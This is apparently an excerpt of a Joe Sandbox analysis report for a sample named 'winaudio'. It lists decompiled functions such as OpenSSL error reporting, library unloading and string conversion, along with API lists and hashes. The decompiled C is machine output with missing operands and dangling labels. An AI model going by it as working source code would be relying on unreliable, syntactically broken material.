                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow_wcsstr
                        • String ID: Service-0x$_OPENSSL_isservice
                        • API String ID: 304827962-1672312481
                        • Opcode ID: d3c025274a6c830585d9540257b05e7c89a086c85ae1dd04af04c6df33e71391
                        • Instruction ID: f4d2b41a1a6a5fa28928db72b14a44c7c5fcf9c364fe22f2b075f5fb6f6cccad
                        • Opcode Fuzzy Hash: d3c025274a6c830585d9540257b05e7c89a086c85ae1dd04af04c6df33e71391
                        • Instruction Fuzzy Hash: C931E531E50245ABCB20DFAAEC45BAE73ACEF45720F504665FD26D71D1EB30EA108B50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002ED260 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 106registryfilewindowCOMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E002ED260(void* __edx, void* __edi, void _a4, char _a259, signed int _a264, intOrPtr _a272, char _a276) {
				long _v0;
				void* __esi;
				signed int _t21;
				void* _t43;
				signed int _t55;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_t62 = __edi;
				_t61 = __edx;
				E00397C10();
				_t21 =  *0x3e1008; // 0x847b54ee
				_a264 = _t21 ^ _t69;
				_t64 = GetStdHandle(0xfffffff4);
				if(_t64 == 0 || GetFileType(_t64) == 0) {
					E0038311E( *(E002D5BE0()) | 0x00000001,  *((intOrPtr*)(_t26 + 4)),  &_a4, 0xff, _a272, 0,  &_a276);
					_t70 = _t69 + 0x1c;
					_a259 = 0;
					if(E002ED120(_t62) <= 0) {
						MessageBoxA(0,  &_a4, "OpenSSL: FATAL", 0x10);
						goto L7;
					} else {
						_t66 = RegisterEventSourceA(0, "OpenSSL");
						if(_t66 == 0) {
							L7:
							_pop(_t65);
							return E002E056D(_a264 ^ _t70, _t61, _t65);
						} else {
							_v0 =  &_a4;
							ReportEventA(_t66, 1, 0, 0, 0, 1, 0,  &_v0, 0);
							DeregisterEventSource(_t66);
							_pop(_t67);
							return E002E056D(_a264 ^ _t70, _t61, _t67);
						}
					}
				} else {
					_t55 =  *(E002D5BE0()) | 0x00000001;
					_t43 =  <  ? _t55 | 0xffffffff : E0038311E(_t55,  *((intOrPtr*)(_t41 + 4)),  &_a4, 0x100, _a272, 0,  &_a276);
					_t44 =  <  ? 0x100 : _t43;
					WriteFile(_t64,  &_a4,  <  ? 0x100 : _t43,  &_v0, 0);
					_pop(_t68);
					return E002E056D(_a264 ^ _t69 + 0x0000001c, _t61, _t68);
				}
			}

















                        0x002ed260
                        0x002ed260
                        0x002ed265
                        0x002ed26a
                        0x002ed271
                        0x002ed281
                        0x002ed285
                        0x002ed328
                        0x002ed32d
                        0x002ed330
                        0x002ed33f
                        0x002ed3a1
                        0x00000000
                        0x002ed341
                        0x002ed34e
                        0x002ed352
                        0x002ed3a7
                        0x002ed3ae
                        0x002ed3bc
                        0x002ed354
                        0x002ed35a
                        0x002ed370
                        0x002ed377
                        0x002ed37d
                        0x002ed392
                        0x002ed392
                        0x002ed352
                        0x002ed292
                        0x002ed2b7
                        0x002ed2c8
                        0x002ed2d9
                        0x002ed2e3
                        0x002ed2e9
                        0x002ed2fe
                        0x002ed2fe

                        APIs
                        • GetStdHandle.KERNEL32(000000F4,002E279B,002ED3D6,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,002ECFAE,.\crypto\cryptlib.c,00000254,pointer != NULL,?,?,?,?), ref: 002ED27B
                        • GetFileType.KERNEL32(00000000), ref: 002ED288
                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 002ED2E3
                        • RegisterEventSourceA.ADVAPI32(00000000,OpenSSL), ref: 002ED348
                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 002ED370
                        • DeregisterEventSource.ADVAPI32(00000000), ref: 002ED377
                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 002ED3A1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Event$FileSource$DeregisterHandleMessageRegisterReportTypeWrite
                        • String ID: OpenSSL$OpenSSL: FATAL
                        • API String ID: 479121790-4224901669
                        • Opcode ID: 1e4f6e54a7898b286b0b7af318ebbfea1f450ee1ce7d8492740dc592d2d20f85
                        • Instruction ID: a954c45f58a16f4e8e47de7b2daf61a92e7ddcef83fd16902d7a108b9fbc6b68
                        • Opcode Fuzzy Hash: 1e4f6e54a7898b286b0b7af318ebbfea1f450ee1ce7d8492740dc592d2d20f85
                        • Instruction Fuzzy Hash: 7E31E471654301ABE725EB60CC47FEB73DCAF49B00F80091AFA85D62D0EBB1D4408BA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037A720 Relevance: 15.1, APIs: 10, Instructions: 67COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0037A720() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t3;
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t7;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t10;

				_t1 =  *0x3edfb8; // 0x0
				if(_t1 != 0) {
					FreeLibrary(_t1);
					 *0x3edfb8 = 0;
				}
				_t2 =  *0x3edfbc; // 0x0
				 *0x3ee038 = 0;
				if(_t2 != 0) {
					FreeLibrary(_t2);
					 *0x3edfbc = 0;
				}
				_t3 =  *0x3edfc0; // 0x0
				if(_t3 != 0) {
					FreeLibrary(_t3);
					 *0x3edfc0 = 0;
				}
				_t4 =  *0x3edfc4; // 0x0
				if(_t4 != 0) {
					FreeLibrary(_t4);
					 *0x3edfc4 = 0;
				}
				_t5 =  *0x3edfc8; // 0x0
				 *0x3ee038 = 0;
				if(_t5 != 0) {
					FreeLibrary(_t5);
					 *0x3edfc8 = 0;
				}
				_t6 =  *0x3edfcc; // 0x0
				if(_t6 != 0) {
					FreeLibrary(_t6);
					 *0x3edfcc = 0;
				}
				_t7 =  *0x3edfd0; // 0x0
				if(_t7 != 0) {
					FreeLibrary(_t7);
					 *0x3edfd0 = 0;
				}
				_t8 =  *0x3edfd4; // 0x0
				if(_t8 != 0) {
					FreeLibrary(_t8);
					 *0x3edfd4 = 0;
				}
				_t9 =  *0x3edfd8; // 0x0
				if(_t9 != 0) {
					FreeLibrary(_t9);
					 *0x3edfd8 = 0;
				}
				_t10 =  *0x3edfdc; // 0x0
				if(_t10 != 0) {
					_t10 = FreeLibrary(_t10);
					 *0x3edfdc = 0;
				}
				 *0x3ee038 = 0;
				return _t10;
			}













                        0x0037a720
                        0x0037a72e
                        0x0037a731
                        0x0037a733
                        0x0037a733
                        0x0037a73d
                        0x0037a742
                        0x0037a74e
                        0x0037a751
                        0x0037a753
                        0x0037a753
                        0x0037a75d
                        0x0037a764
                        0x0037a767
                        0x0037a769
                        0x0037a769
                        0x0037a773
                        0x0037a77a
                        0x0037a77d
                        0x0037a77f
                        0x0037a77f
                        0x0037a789
                        0x0037a78e
                        0x0037a79a
                        0x0037a79d
                        0x0037a79f
                        0x0037a79f
                        0x0037a7a9
                        0x0037a7b0
                        0x0037a7b3
                        0x0037a7b5
                        0x0037a7b5
                        0x0037a7bf
                        0x0037a7c6
                        0x0037a7c9
                        0x0037a7cb
                        0x0037a7cb
                        0x0037a7d5
                        0x0037a7dc
                        0x0037a7df
                        0x0037a7e1
                        0x0037a7e1
                        0x0037a7eb
                        0x0037a7f2
                        0x0037a7f5
                        0x0037a7f7
                        0x0037a7f7
                        0x0037a801
                        0x0037a808
                        0x0037a80b
                        0x0037a80d
                        0x0037a80d
                        0x0037a817
                        0x0037a822

                        APIs
                        • FreeLibrary.KERNEL32(00000000,00000000,0037949B,?,00000000,00000000,00000001,?,?,847B54EE,?,00000001,00000000), ref: 0037A731
                        • FreeLibrary.KERNEL32(00000000,00000000,0037949B,?,00000000,00000000,00000001,?,?,847B54EE,?,00000001,00000000), ref: 0037A751
                        • FreeLibrary.KERNEL32(00000000,00000000,0037949B,?,00000000,00000000,00000001,?,?,847B54EE,?,00000001,00000000), ref: 0037A767
                        • FreeLibrary.KERNEL32(00000000,00000000,0037949B,?,00000000,00000000,00000001,?,?,847B54EE,?,00000001,00000000), ref: 0037A77D
                        • FreeLibrary.KERNEL32(00000000,00000000,0037949B,?,00000000,00000000,00000001,?,?,847B54EE,?,00000001,00000000), ref: 0037A79D
                        • FreeLibrary.KERNEL32(00000000,00000000,0037949B,?,00000000,00000000,00000001,?,?,847B54EE,?,00000001,00000000), ref: 0037A7B3
                        • FreeLibrary.KERNEL32(00000000,00000000,0037949B,?,00000000,00000000,00000001,?,?,847B54EE,?,00000001,00000000), ref: 0037A7C9
                        • FreeLibrary.KERNEL32(00000000,00000000,0037949B,?,00000000,00000000,00000001,?,?,847B54EE,?,00000001,00000000), ref: 0037A7DF
                        • FreeLibrary.KERNEL32(00000000,00000000,0037949B,?,00000000,00000000,00000001,?,?,847B54EE,?,00000001,00000000), ref: 0037A7F5
                        • FreeLibrary.KERNEL32(00000000,00000000,0037949B,?,00000000,00000000,00000001,?,?,847B54EE,?,00000001,00000000), ref: 0037A80B
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: 4c689a53aef1a2d71996ef29905ea333f4eea2b2ebc61637eabdac2ab70ad657
                        • Instruction ID: b4f5db3a106b104b8fc0994a7d39d548938b35e8932adf167a029cf18fa323ef
                        • Opcode Fuzzy Hash: 4c689a53aef1a2d71996ef29905ea333f4eea2b2ebc61637eabdac2ab70ad657
                        • Instruction Fuzzy Hash: 0F21CCB06102919AEB32CF65ECC8B0A3BECB744344F05861AE405DF2E4D7B9D8068FA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0039576D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268COMMON
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E0039576D(void* __ebx, intOrPtr __edx, void* __edi, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, short* _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __esi;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				short _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				intOrPtr _t120;
				intOrPtr* _t122;
				short* _t123;
				short* _t124;
				signed int _t125;
				short* _t126;

				_t120 = __edx;
				_t63 =  *0x3e1008; // 0x847b54ee
				_v8 = _t63 ^ _t125;
				_t124 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t122 = _a16;
				_v36 = _t122;
				if(_t124 <= 0) {
					if(_t124 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t124 = E00395392(_t122, _t124);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E00395392(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t14 =  &_v44; // 0x395a46
							_t70 =  *( *((intOrPtr*)( *_t14)) + 8);
							_a32 = _t70;
						}
						if(_t124 == 0 || _t99 == 0) {
							if(_t124 != _t99) {
								if(_t99 <= 1) {
									if(_t124 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t124 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t124 = _v40;
															while(1) {
																_t120 =  *((intOrPtr*)(_t114 + 1));
																if(_t120 == 0) {
																	goto L15;
																}
																_t101 =  *_t124;
																if(_t101 <  *_t114 || _t101 > _t120) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t120 =  *((intOrPtr*)(_t115 + 1));
															if(_t120 == 0) {
																goto L17;
															}
															_t102 =  *_t122;
															if(_t102 <  *_t115 || _t102 > _t120) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t123 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t124, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E0038B939(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00397C40();
										_t87 = _t126;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t40 =  &_v44; // 0x395a46
												_t124 = _a32;
												if(MultiByteToWideChar(_t124, 1, _v36, _t124, _t73,  *_t40) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t124, 9, _v40, _t99, _t123, _t123);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t120 = _t77 + _t77;
														_t108 = _t120 + 8;
														asm("sbb eax, eax");
														if((_t120 + 0x00000008 & _t77) == 0) {
															_t124 = _t123;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t120 + 0x00000008;
															_t108 = _t120 + 8;
															if((_t77 & _t120 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t124 = E0038B939(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t124 == 0) {
																	goto L59;
																} else {
																	 *_t124 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00397C40();
																_t124 = _t126;
																if(_t124 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t124 = 0xcccc;
																	L54:
																	_t124 =  &(_t124[4]);
																	L56:
																	if(_t124 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t124, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t123 = E0038DAA1(_t108, _v48, _a12, _v32, _v44, _t124, _v36, _t123, _t123, _t123);
																	}
																}
															}
														}
														E003839E9(_t124);
													}
												}
											}
										}
									}
								}
								E003839E9(_t100);
							}
						}
					}
				}
				L63:
				return E002E056D(_v8 ^ _t125, _t120, _t124);
			}

































                        0x0039576d
                        0x00395775
                        0x0039577c
                        0x00395784
                        0x00395787
                        0x0039578d
                        0x00395790
                        0x00395793
                        0x00395797
                        0x0039579a
                        0x0039579f
                        0x003957c6
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x003957a1
                        0x003957a9
                        0x003957ab
                        0x003957af
                        0x003957af
                        0x003957b4
                        0x003957d2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x003957b6
                        0x003957bf
                        0x003957d4
                        0x003957d4
                        0x003957d9
                        0x003957db
                        0x003957e0
                        0x003957e3
                        0x003957e3
                        0x003957e8
                        0x003957f4
                        0x00395801
                        0x0039580e
                        0x00395821
                        0x00000000
                        0x00395823
                        0x00395825
                        0x00395858
                        0x00000000
                        0x0039585a
                        0x0039585c
                        0x00395860
                        0x00395866
                        0x00395869
                        0x0039586b
                        0x0039586e
                        0x0039586e
                        0x00395873
                        0x00000000
                        0x00000000
                        0x00395875
                        0x00395879
                        0x00395883
                        0x00395888
                        0x00000000
                        0x0039588a
                        0x00000000
                        0x0039588a
                        0x00395888
                        0x00000000
                        0x00395879
                        0x0039586e
                        0x00395869
                        0x00000000
                        0x00395860
                        0x00395827
                        0x00395829
                        0x0039582d
                        0x00395833
                        0x00395836
                        0x00395838
                        0x00395838
                        0x0039583d
                        0x00000000
                        0x00000000
                        0x0039583f
                        0x00395843
                        0x0039584d
                        0x00395852
                        0x00000000
                        0x00395854
                        0x00000000
                        0x00395854
                        0x00395852
                        0x00000000
                        0x00395843
                        0x00395838
                        0x00395836
                        0x00000000
                        0x0039582d
                        0x00395825
                        0x00395810
                        0x00395810
                        0x00395810
                        0x00000000
                        0x00395810
                        0x00395803
                        0x00395803
                        0x00395805
                        0x003957f6
                        0x003957f6
                        0x003957f8
                        0x003957f8
                        0x0039588f
                        0x0039588f
                        0x0039588f
                        0x0039589c
                        0x003958a2
                        0x003958a7
                        0x003957c8
                        0x003958ad
                        0x003958ad
                        0x003958b5
                        0x003958b9
                        0x00395914
                        0x00395916
                        0x00000000
                        0x003958bb
                        0x003958c0
                        0x003958c2
                        0x003958c4
                        0x003958cc
                        0x003958f0
                        0x003958f5
                        0x003958fa
                        0x00395900
                        0x00000000
                        0x00395906
                        0x00395906
                        0x00000000
                        0x00395906
                        0x003958ce
                        0x003958d0
                        0x003958d4
                        0x003958d9
                        0x003958db
                        0x003958e0
                        0x003959f5
                        0x003959f5
                        0x003958e6
                        0x003958e6
                        0x0039590c
                        0x0039590c
                        0x0039590f
                        0x00395919
                        0x0039591b
                        0x00000000
                        0x00395921
                        0x00395921
                        0x00395929
                        0x00395937
                        0x00000000
                        0x0039593d
                        0x00395946
                        0x0039594c
                        0x00395951
                        0x00000000
                        0x00395957
                        0x00395957
                        0x0039595a
                        0x0039595f
                        0x00395963
                        0x003959af
                        0x00000000
                        0x00395965
                        0x0039596a
                        0x0039596c
                        0x0039596e
                        0x00395976
                        0x00395993
                        0x0039599d
                        0x0039599f
                        0x003959a2
                        0x00000000
                        0x003959a4
                        0x003959a4
                        0x00000000
                        0x003959a4
                        0x00395978
                        0x0039597a
                        0x0039597e
                        0x00395983
                        0x00395987
                        0x003959e9
                        0x003959e9
                        0x00395989
                        0x00395989
                        0x003959aa
                        0x003959aa
                        0x003959b1
                        0x003959b3
                        0x00000000
                        0x003959cc
                        0x003959cc
                        0x003959e5
                        0x003959e5
                        0x003959b3
                        0x00395987
                        0x00395976
                        0x003959ed
                        0x003959f2
                        0x00395951
                        0x00395937
                        0x0039591b
                        0x003958e0
                        0x003958cc
                        0x003959f9
                        0x003959ff
                        0x003958a7
                        0x003957e8
                        0x003957b4
                        0x00395a01
                        0x00395a14

                        APIs
                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00395A46,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00395819
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00395A46,00000000,00000000,?,00000001,?,?,?,?), ref: 0039589C
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,FZ9,?,00395A46,00000000,00000000,?,00000001,?,?,?,?), ref: 0039592F
                        • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,00395A46,00000000,00000000,?,00000001,?,?,?,?), ref: 00395946
                          • Part of subcall function 0038B939: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0038B96B
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,00395A46,00000000,00000000,?,00000001,?,?,?,?), ref: 003959C2
                        • __freea.LIBCMT ref: 003959ED
                        • __freea.LIBCMT ref: 003959F9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                        • String ID: FZ9
                        • API String ID: 2829977744-2483492278
                        • Opcode ID: 2af2def87702c77a4fc8276b1bc770b2695e87a6d47f3b2f64f14321b4afca92
                        • Instruction ID: 3c8df639aba2c7815292c33e0bc61c12aa774dc865d174c582cb7cf410f28cad
                        • Opcode Fuzzy Hash: 2af2def87702c77a4fc8276b1bc770b2695e87a6d47f3b2f64f14321b4afca92
                        • Instruction Fuzzy Hash: 3D91C272E14A16DBEF239EA4CC81AEE7BA9AF09710F150659E901EB240D735DCC0C760
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00391E02 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E00391E02(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x3e1008; // 0x847b54ee
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x3f0290 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x3f0290 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E0038D771(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x3f0290 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x3f0290 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x3f0290 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E0038E187( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E0038E187();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								_t45 =  &_v36; // 0x392577
								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											_t55 =  &_v36; // 0x392577
											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E002E056D(_v8 ^ _t133, _t129, _t132);
			}



































                        0x00391e0a
                        0x00391e11
                        0x00391e14
                        0x00391e1c
                        0x00391e20
                        0x00391e2c
                        0x00391e2f
                        0x00391e32
                        0x00391e39
                        0x00391e41
                        0x00391e44
                        0x00391e4a
                        0x00391e50
                        0x00391e55
                        0x00391e57
                        0x00391e5a
                        0x00391e5f
                        0x00391e69
                        0x00391e70
                        0x00391e73
                        0x00391e7a
                        0x00391e81
                        0x00391e9c
                        0x00391ea4
                        0x00391ead
                        0x00391ed3
                        0x00391ed5
                        0x00000000
                        0x00391eaf
                        0x00391eb2
                        0x00391f79
                        0x00391f85
                        0x00391f90
                        0x00391f95
                        0x00391eb8
                        0x00391ebf
                        0x00391ec4
                        0x00391eca
                        0x00391ed0
                        0x00000000
                        0x00391ed0
                        0x00391eca
                        0x00391eb2
                        0x00391e83
                        0x00391e87
                        0x00391e8a
                        0x00391e90
                        0x00391e92
                        0x00391e95
                        0x00391e99
                        0x00391ed6
                        0x00391ed9
                        0x00391eda
                        0x00391edf
                        0x00391ee5
                        0x00391eeb
                        0x00391efa
                        0x00391f00
                        0x00391f06
                        0x00391f0b
                        0x00391f13
                        0x00391f27
                        0x00391f9a
                        0x00391fa0
                        0x00391f29
                        0x00391f31
                        0x00391f3a
                        0x00391f40
                        0x00000000
                        0x00391f42
                        0x00391f44
                        0x00391f47
                        0x00391f4b
                        0x00391f60
                        0x00000000
                        0x00391f62
                        0x00391f66
                        0x00391f68
                        0x00391f6b
                        0x00000000
                        0x00391f6b
                        0x00391f66
                        0x00391f60
                        0x00391f40
                        0x00391f3a
                        0x00391f27
                        0x00391f0b
                        0x00391ee5
                        0x00000000
                        0x00391f6e
                        0x00391f6e
                        0x00391fa2
                        0x00391fb4

                        APIs
